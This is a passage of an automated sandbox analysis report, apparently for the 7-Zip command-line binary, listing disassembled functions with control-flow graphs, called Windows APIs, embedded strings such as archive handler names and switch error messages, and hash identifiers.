                                                                                                                                                                                                                                                                            control_flow_graph 2649 68a180-68a1e9 GetProcAddress * 2 2650 68a1eb-68a1fe GetProcAddress 2649->2650 2651 68a214-68a22a GetProcAddress 2649->2651 2653 68a233-68a23e 2650->2653 2654 68a200-68a20d 2650->2654 2652 68a22c-68a22e 2651->2652 2651->2653 2655 68a72b-68a73e 2652->2655 2656 68a729 2653->2656 2657 68a244-68a2f0 call 663208 call 688928 2653->2657 2654->2653 2660 68a20f 2654->2660 2656->2655 2664 68a648 2657->2664 2665 68a2f6-68a30a 2657->2665 2660->2655 2666 68a718-68a727 call 6894a8 2664->2666 2667 68a31c-68a321 2665->2667 2668 68a30c-68a31a 2665->2668 2666->2655 2670 68a328-68a32b 2667->2670 2668->2670 2673 68a34a-68a350 2670->2673 2674 68a32d-68a345 call 66ae2c call 6894a8 2670->2674 2676 68a36f-68a37d SysStringByteLen 2673->2676 2677 68a352-68a36a call 66ae2c call 6894a8 2673->2677 2691 68a634-68a63d 2674->2691 2680 68a64d-68a65d call 66ae2c 2676->2680 2681 68a383-68a3e3 call 66ae2c * 2 call 663208 * 2 call 688928 2676->2681 2677->2691 2680->2666 2701 68a3e9-68a40c call 688928 2681->2701 2702 68a662-68a678 free * 2 2681->2702 2691->2657 2694 68a643 2691->2694 2694->2656 2705 68a67d-68a693 free * 2 2701->2705 2706 68a412-68a485 call 689d98 call 6887a8 call 688860 2701->2706 2702->2666 2705->2666 2713 68a698-68a6ae free * 2 2706->2713 2714 68a48b-68a49c 2706->2714 2713->2666 2715 68a4ee-68a51b call 689380 2714->2715 2716 68a49e-68a4a5 2714->2716 2722 68a6b0-68a6d1 free * 3 2715->2722 2723 68a521-68a526 2715->2723 2717 68a4ab-68a4d9 call 6887a8 2716->2717 2724 68a4db-68a4de 2717->2724 2725 68a4e5-68a4ec 2717->2725 2722->2666 2726 68a528-68a53f call 6898d4 2723->2726 2727 68a541-68a564 call 689380 2723->2727 2724->2725 2725->2715 2725->2717 2732 68a583-68a5b7 call 688860 2726->2732 2733 68a56a-68a57e call 68a034 2727->2733 2734 68a6d3-68a6f4 free * 3 2727->2734 2738 68a5bd-68a5c0 2732->2738 2739 68a6f6-68a715 free * 3 2732->2739 2733->2732 2734->2666 2740 68a5cf-68a5e4 call 662130 2738->2740 2741 68a5c2-68a5ca 2738->2741 2739->2666 2744 68a5f8 2740->2744 2745 68a5e6-68a5f1 call 689af0 2740->2745 2741->2740 2746 68a5fb-68a62f call 66b8f0 free * 3 call 6894a8 2744->2746 2748 68a5f6 2745->2748 2746->2691 2748->2746
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                                                                            • String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
                                                                                                                                                                                                                                                                            • API String ID: 190572456-3984264347
                                                                                                                                                                                                                                                                            • Opcode ID: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
                                                                                                                                                                                                                                                                            • Instruction ID: be94d1f54e7ac9f51e96523260f08db0c281dedb3d5c0532ff6e6bd48b28453b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36D1A172319AC086DB60EB61E4507AEB3A6F7C6780F400626EB8E93B59DF7CC545CB05
                                                                                                                                                                                                                                                                            Function 006670C8 Relevance: 40.7, APIs: 27, Instructions: 237COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 2752 6670c8-6670e4 call 667d4c 2754 6670e9-6670ec 2752->2754 2755 6670ee-6670f0 2754->2755 2756 6670f9-667103 call 669d84 2754->2756 2755->2756 2757 6670f2-6670f4 2755->2757 2761 667105-667107 2756->2761 2762 66710c-667136 call 669ed8 call 663274 call 66376c 2756->2762 2760 667449-667458 2757->2760 2761->2760 2769 66715b-667175 call 663314 2762->2769 2770 667138-667141 2762->2770 2776 66717a-667186 call 66a170 2769->2776 2770->2769 2771 667143-667145 2770->2771 2773 667147 2771->2773 2774 66714c-667155 2771->2774 2777 6673f1-6673fe free 2773->2777 2774->2769 2780 6671aa-6671ac 2776->2780 2781 667188-667195 CreateDirectoryW 2776->2781 2777->2760 2784 6671b2-6671d2 call 663208 call 66a7ec 2780->2784 2785 66727d-667286 GetLastError 2780->2785 2782 667360-667364 2781->2782 2783 66719b-6671a4 GetLastError 2781->2783 2786 667366-667379 call 669ab0 2782->2786 2787 6673c9-6673e1 free * 2 2782->2787 2783->2780 2783->2785 2808 667273-667278 free 2784->2808 2809 6671d8-6671e7 CreateDirectoryW 2784->2809 2789 6672e4-6672ed GetLastError 2785->2789 2790 667288-6672b5 call 667d28 call 663208 call 667ebc 2785->2790 2800 667381 2786->2800 2801 66737b-66737f 2786->2801 2787->2760 2792 6673e3-6673ee free 2789->2792 2793 6672f3-667301 call 66376c 2789->2793 2822 6672c6-6672db free 2790->2822 2823 6672b7-6672c4 free 2790->2823 2792->2777 2806 667307-667309 2793->2806 2807 667432-667447 free * 2 2793->2807 2805 667385-6673a3 call 663460 call 666c84 2800->2805 2801->2805 2835 6673a5-6673a9 2805->2835 2836 6673ad-6673c4 free * 2 2805->2836 2806->2807 2812 66730f-667316 2806->2812 2807->2760 2808->2785 2813 667356-66735b free 2809->2813 2814 6671ed-6671f6 GetLastError 2809->2814 2817 66732c-667332 2812->2817 2818 667318-66731c 2812->2818 2813->2782 2819 667207-667230 call 667d28 call 663208 call 667ebc 2814->2819 2820 6671f8-667202 free 2814->2820 2827 667338-66733c 2817->2827 2828 667419-667430 free * 2 2817->2828 2825 667322-667326 2818->2825 2826 667400-667417 free * 2 2818->2826 2841 667232-66724a free * 2 2819->2841 2842 66724f-667271 free * 2 2819->2842 2820->2789 2831 6672e0-6672e2 2822->2831 2823->2789 2825->2817 2825->2826 2826->2760 2827->2776 2833 667342-667351 2827->2833 2828->2760 2831->2782 2831->2789 2833->2776 2835->2786 2838 6673ab 2835->2838 2836->2760 2838->2787 2841->2789 2842->2831
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00667D4C: GetFileAttributesW.KERNELBASE ref: 00667D6E
                                                                                                                                                                                                                                                                              • Part of subcall function 00667D4C: GetFileAttributesW.KERNEL32 ref: 00667DA5
                                                                                                                                                                                                                                                                              • Part of subcall function 00667D4C: free.MSVCRT ref: 00667DB2
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006673F6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesFilefree
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1936811914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                                                                                                                                                            • Instruction ID: e9e444fa338e7b289ebcd480162310835435e7e58b3c07f8f165e5427d9a86a2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD81863221C54182CB60EF21E4613AEA363FBC6788F441126FB8E93769DF29D906DB45
                                                                                                                                                                                                                                                                            Function 00667EBC Relevance: 37.2, APIs: 18, Strings: 3, Instructions: 418COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 2843 667ebc-667ee3 call 669b68 2846 667fca-667fd6 call 669ddc 2843->2846 2847 667ee9-667f26 call 66339c call 669ce4 2843->2847 2853 668253-66828a call 669d0c call 669b30 2846->2853 2854 667fdc-667fe4 2846->2854 2859 667f8c-667fa4 call 6691dc 2847->2859 2860 667f28-667f2c 2847->2860 2870 668306-66830b 2853->2870 2871 66828c-668294 2853->2871 2854->2853 2856 667fea-66800c call 663274 * 2 2854->2856 2878 66800e-668017 2856->2878 2879 66801b-668020 2856->2879 2874 667fa6 2859->2874 2875 667fa8-667fac 2859->2875 2860->2859 2863 667f2e-667f77 call 66abb0 2860->2863 2863->2859 2877 667f79-667f87 2863->2877 2883 66830d-668312 2870->2883 2884 668318-66831c 2870->2884 2871->2870 2876 668296-6682a5 call 667d4c 2871->2876 2880 667fb9-667fc5 call 6689d8 2874->2880 2881 667fb6 2875->2881 2882 667fae-667fb3 2875->2882 2892 6684f2-668500 call 667978 2876->2892 2903 6682ab-6682b2 2876->2903 2888 668519-668524 2877->2888 2878->2879 2889 668022-66803e call 662880 2879->2889 2890 668040-66804c call 663670 2879->2890 2880->2888 2881->2880 2882->2881 2883->2884 2883->2892 2885 668377-668381 call 669c80 2884->2885 2886 66831e-668330 call 667d4c 2884->2886 2885->2892 2908 668387-668396 2885->2908 2886->2892 2907 668336-66833d 2886->2907 2889->2890 2900 668051-668062 call 669ce4 2889->2900 2890->2900 2904 668505-668506 2892->2904 2916 668064-668067 2900->2916 2917 6680b1-6680bb call 667ebc 2900->2917 2903->2892 2909 6682b8-6682eb call 66339c 2903->2909 2910 668509-668511 call 66794c 2904->2910 2907->2892 2912 668343-668372 2907->2912 2908->2892 2913 66839c-6683a6 call 669ab0 2908->2913 2924 6682fc-668301 2909->2924 2925 6682ed-6682f8 2909->2925 2920 668516 2910->2920 2912->2910 2913->2892 2930 6683ac-6683c2 call 663274 2913->2930 2921 668075-6680a3 2916->2921 2922 668069-66806c 2916->2922 2929 6680c1-668108 call 663314 call 663208 call 667ce0 2917->2929 2934 66823e-66824e free * 2 2917->2934 2920->2888 2928 6680a5-6680af call 663404 2921->2928 2921->2929 2922->2917 2927 66806e-668073 2922->2927 2924->2910 2925->2924 2927->2917 2927->2921 2928->2929 2953 66815a-668185 free * 2 call 66794c free 2929->2953 2954 66810a-668111 2929->2954 2940 6683c4-6683ce call 662fec 2930->2940 2941 6683d2-6683f2 2930->2941 2934->2853 2940->2941 2944 6683f4-6683fe call 662fec 2941->2944 2945 668402-668437 call 667978 2941->2945 2944->2945 2955 668484-66849d call 667d4c 2945->2955 2956 668439-668457 wcscmp 2945->2956 2968 66822d-668239 free 2953->2968 2957 668113-668124 call 662748 2954->2957 2958 66818a-6681c1 SetLastError free * 2 call 66794c free 2954->2958 2969 6684b3-6684f0 call 66339c free 2955->2969 2970 66849f-6684a1 2955->2970 2959 66847c 2956->2959 2960 668459-668477 call 66339c free 2956->2960 2977 6681c3-6681ca 2957->2977 2978 66812a-668158 free call 663208 call 667ce0 2957->2978 2958->2968 2959->2955 2960->2910 2968->2888 2969->2910 2974 6684a7-6684b1 free 2970->2974 2975 6684a3-6684a5 2970->2975 2974->2892 2975->2969 2975->2974 2979 6681e0-66822a call 66362c free * 2 call 66794c free 2977->2979 2980 6681cc-6681d1 2977->2980 2978->2953 2978->2954 2979->2968 2980->2979 2983 6681d3-6681dc 2980->2983 2983->2979
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0066812F
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0066816A
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0066817F
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00668232
                                                                                                                                                                                                                                                                              • Part of subcall function 0066ABB0: GetModuleHandleW.KERNEL32 ref: 0066ABD1
                                                                                                                                                                                                                                                                              • Part of subcall function 0066ABB0: GetProcAddress.KERNEL32 ref: 0066ABE1
                                                                                                                                                                                                                                                                              • Part of subcall function 0066ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0066AC32
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32 ref: 0066818F
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0066819B
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006681A6
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006681BB
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00668243
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0066824E
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0066815F
                                                                                                                                                                                                                                                                              • Part of subcall function 0066339C: free.MSVCRT ref: 006633D7
                                                                                                                                                                                                                                                                              • Part of subcall function 0066339C: memmove.MSVCRT(00000000,?,?,00000000,006610A8), ref: 006633F2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$AddressDiskErrorFreeHandleLastModuleProcSpacememmove
                                                                                                                                                                                                                                                                            • String ID: :$:$DATA$\
                                                                                                                                                                                                                                                                            • API String ID: 4130059181-1004618218
                                                                                                                                                                                                                                                                            • Opcode ID: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                                                                                                                                                            • Instruction ID: b0f59f37f0c9ba1d176fd7e950c79b2c4d9cc4e316837d94293e4bf93687f756
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3802C473508681DACB60DF25D4A029EB772F795350F40432AE79E83B68DF34D9A5CB48
                                                                                                                                                                                                                                                                            Function 006A3E84 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 227COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 2991 6a3e84-6a3eb5 2992 6a3ebb 2991->2992 2993 6a41e8 2991->2993 2995 6a3ebe-6a3efa fputs call 6a2e24 2992->2995 2994 6a41ea-6a41fd 2993->2994 2998 6a3efc-6a3f03 2995->2998 2999 6a3f51-6a3f59 2995->2999 3002 6a3f1f-6a3f4c call 663274 call 6a30cc free 2998->3002 3003 6a3f05-6a3f1d fputs call 662300 2998->3003 3000 6a3f5b-6a3f62 2999->3000 3001 6a3f64-6a3f6f 2999->3001 3005 6a3f73-6a3f9e call 6a2e24 call 6a3148 3000->3005 3001->3005 3002->2999 3003->2999 3015 6a3fd3-6a3fe3 call 6a3034 3005->3015 3016 6a3fa0-6a3fce fputs * 2 call 662640 call 662300 3005->3016 3020 6a3fe8-6a3fea 3015->3020 3016->3015 3020->2994 3022 6a3ff0-6a3ff7 3020->3022 3023 6a3ff9-6a4027 fputs * 2 call 6626a0 call 662300 3022->3023 3024 6a402c-6a403c 3022->3024 3023->3024 3024->2994 3029 6a4042-6a4048 3024->3029 3030 6a404a-6a4079 3029->3030 3031 6a40af-6a40b9 3029->3031 3036 6a41b9 3030->3036 3037 6a407f-6a4096 call 6a3034 3030->3037 3032 6a40bf-6a40e0 fputs 3031->3032 3033 6a419d-6a41b1 3031->3033 3032->3033 3041 6a40e6-6a40fc 3032->3041 3033->2995 3035 6a41b7 3033->3035 3035->2993 3040 6a41bd-6a41ca SysFreeString 3036->3040 3044 6a41bb 3037->3044 3045 6a409c-6a40ad SysFreeString 3037->3045 3040->2994 3041->3033 3043 6a4102-6a4133 3041->3043 3047 6a4139-6a4162 3043->3047 3048 6a41cc 3043->3048 3044->3040 3045->3030 3045->3031 3051 6a41ce-6a41d8 call 66ae2c 3047->3051 3052 6a4164-6a4197 call 6a2ecc call 66ae2c SysFreeString 3047->3052 3049 6a41d9-6a41e6 SysFreeString 3048->3049 3049->2994 3051->3049 3052->3033 3052->3043
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$FreeString$fputcfree
                                                                                                                                                                                                                                                                            • String ID: = $--$----$Path$Type$Warning: The archive is open with offset
                                                                                                                                                                                                                                                                            • API String ID: 2701146716-1919703766
                                                                                                                                                                                                                                                                            • Opcode ID: d0af8d30afaf3860d06d0172aa01809f7158207eed1de8f3100d6c3c0d1120ab
                                                                                                                                                                                                                                                                            • Instruction ID: 6001524a65655eba0a9191fa6dc8f7dc53bed31acc5e410706eed85497ba70e8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0af8d30afaf3860d06d0172aa01809f7158207eed1de8f3100d6c3c0d1120ab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7917B76314A8582CB50EF62E8607AE7362F7D6BC4F005126EE5A97B28DF39CD55CB00
                                                                                                                                                                                                                                                                            Function 0066F71C Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 218COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 3059 66f71c-66f74e call 661610 3062 66f774-66f7c2 _isatty * 3 3059->3062 3063 66f750-66f773 call 6802a0 _CxxThrowException 3059->3063 3065 66f7d4 3062->3065 3066 66f7c4-66f7c8 3062->3066 3063->3062 3069 66f7d9-66f81c 3065->3069 3066->3065 3068 66f7ca-66f7ce 3066->3068 3068->3065 3070 66f7d0-66f7d2 3068->3070 3071 66f81e-66f822 3069->3071 3072 66f82a 3069->3072 3070->3069 3071->3072 3073 66f824-66f828 3071->3073 3074 66f830-66f834 3072->3074 3073->3072 3073->3074 3075 66f836 3074->3075 3076 66f83c-66f846 3074->3076 3075->3076 3077 66f854-66f85e 3076->3077 3078 66f848-66f84e 3076->3078 3079 66f860-66f866 3077->3079 3080 66f86c-66f876 3077->3080 3078->3077 3079->3080 3081 66f884-66f88e 3080->3081 3082 66f878-66f87e 3080->3082 3083 66f8f3-66f8fd 3081->3083 3084 66f890-66f89d 3081->3084 3082->3081 3085 66f8ff-66f917 3083->3085 3086 66f91a-66f931 call 66ac74 * 2 3083->3086 3087 66f89f-66f8a9 3084->3087 3088 66f8ab-66f8be call 66ed34 3084->3088 3085->3086 3096 66f936-66f940 3086->3096 3087->3083 3094 66f8e6-66f8ed 3088->3094 3095 66f8c0-66f8e5 call 6802a0 _CxxThrowException 3088->3095 3094->3083 3095->3094 3098 66f946-66f95c 3096->3098 3099 66f9dd-66f9e7 3096->3099 3101 66f965-66f977 wcscmp 3098->3101 3102 66f95e-66f963 3098->3102 3103 66fa94-66fa9c 3099->3103 3104 66f9ed-66f9fa 3099->3104 3105 66f9bb-66f9c2 call 66ad0c 3101->3105 3106 66f979-66f98c call 66ed34 3101->3106 3102->3105 3104->3103 3107 66fa00-66fa1c call 662bc8 call 662d34 3104->3107 3105->3099 3114 66f9c4-66f9d7 call 6ad4c0 call 66ac74 3105->3114 3115 66f9b4 3106->3115 3116 66f98e-66f9b3 call 6802a0 _CxxThrowException 3106->3116 3123 66fa1e-66fa3b call 663f78 3107->3123 3124 66fa4f-66fa74 call 6802a0 _CxxThrowException 3107->3124 3114->3099 3115->3105 3116->3115 3131 66fa3d-66fa46 3123->3131 3132 66fa49-66fa4d 3123->3132 3133 66fa75-66fa8f GetCurrentProcess SetProcessAffinityMask free 3124->3133 3131->3132 3132->3124 3132->3133 3133->3103
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • SeRestorePrivilege, xrefs: 0066F91C
                                                                                                                                                                                                                                                                            • SeLockMemoryPrivilege, xrefs: 0066F9CB
                                                                                                                                                                                                                                                                            • SeCreateSymbolicLinkPrivilege, xrefs: 0066F92A
                                                                                                                                                                                                                                                                            • Unsupported switch postfix -bb, xrefs: 0066F8C3
                                                                                                                                                                                                                                                                            • Unsupported switch postfix -stm, xrefs: 0066FA52
                                                                                                                                                                                                                                                                            • Unsupported switch postfix for -slp, xrefs: 0066F991
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionThrowfree$_isatty$Process$AffinityCurrentMaskwcscmp
                                                                                                                                                                                                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                                                                                                                                                                                                                                                                            • API String ID: 1961088698-2328792591
                                                                                                                                                                                                                                                                            • Opcode ID: 9fbf6495933f589f3caaa937893ccbef6d2c554dfb66b53bc2ba33e20914ec5e
                                                                                                                                                                                                                                                                            • Instruction ID: 6f77f1b57a348706ec101a5da37882c4d91c819882a83e86136e6c5889490998
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fbf6495933f589f3caaa937893ccbef6d2c554dfb66b53bc2ba33e20914ec5e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65A1BF73608AC4CAEB61DF25E4903AC3F22E386B94F98817ADB8C47725CF25C995C701
                                                                                                                                                                                                                                                                            Function 006AA448 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 3134 6aa448-6aa455 3135 6aa49c-6aa4a4 3134->3135 3136 6aa457-6aa45f 3134->3136 3138 6aa4a6-6aa4a9 3135->3138 3139 6aa4f4 3135->3139 3136->3135 3137 6aa461-6aa495 call 662300 fputs call 6626a0 call 662300 3136->3137 3137->3135 3142 6aa4ab-6aa4da call 662300 fputs call 6626a0 call 662300 3138->3142 3143 6aa4df-6aa4e5 3138->3143 3141 6aa4fc-6aa50a 3139->3141 3145 6aa50c 3141->3145 3146 6aa53d-6aa559 free 3141->3146 3142->3143 3143->3141 3149 6aa510-6aa526 3145->3149 3150 6aa55b 3146->3150 3151 6aa58c-6aa5b5 free 3146->3151 3154 6aa538-6aa53b 3149->3154 3155 6aa528-6aa533 free * 2 3149->3155 3156 6aa55f-6aa575 3150->3156 3162 6aa5b7-6aa5be 3151->3162 3163 6aa5c5-6aa5c8 3151->3163 3154->3146 3154->3149 3155->3154 3160 6aa587-6aa58a 3156->3160 3161 6aa577-6aa582 free * 2 3156->3161 3160->3151 3160->3156 3161->3160 3162->3163 3165 6aa5c0 3162->3165 3167 6aa5ca-6aa5e6 _CxxThrowException 3163->3167 3168 6aa5e7-6aa603 free 3163->3168 3170 6aa5c0 call 6a66a8 3165->3170 3167->3168 3171 6aa626-6aa637 free call 68a13c 3168->3171 3172 6aa605 3168->3172 3170->3163 3175 6aa63c-6aa675 call 6a7080 call 66182c call 6a7f50 3171->3175 3173 6aa609-6aa624 free 3172->3173 3173->3171 3173->3173 3182 6aa6a8-6aa6c9 free 3175->3182 3183 6aa677 3175->3183 3184 6aa67b-6aa691 3183->3184 3186 6aa6a3-6aa6a6 3184->3186 3187 6aa693-6aa69e free * 2 3184->3187 3186->3182 3186->3184 3187->3186
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$fputs$ExceptionThrowfputc
                                                                                                                                                                                                                                                                            • String ID: Errors: $Warnings:
                                                                                                                                                                                                                                                                            • API String ID: 437615013-2345102087
                                                                                                                                                                                                                                                                            • Opcode ID: c75879e89a0d6b0eb1bb642928b78a50b68f1ecf96ffdd04da6d3d4d6d5326dc
                                                                                                                                                                                                                                                                            • Instruction ID: 12a4a45d38254e7f8257505adc210c5289e342d44a10f61d1b0d7979a60cd387
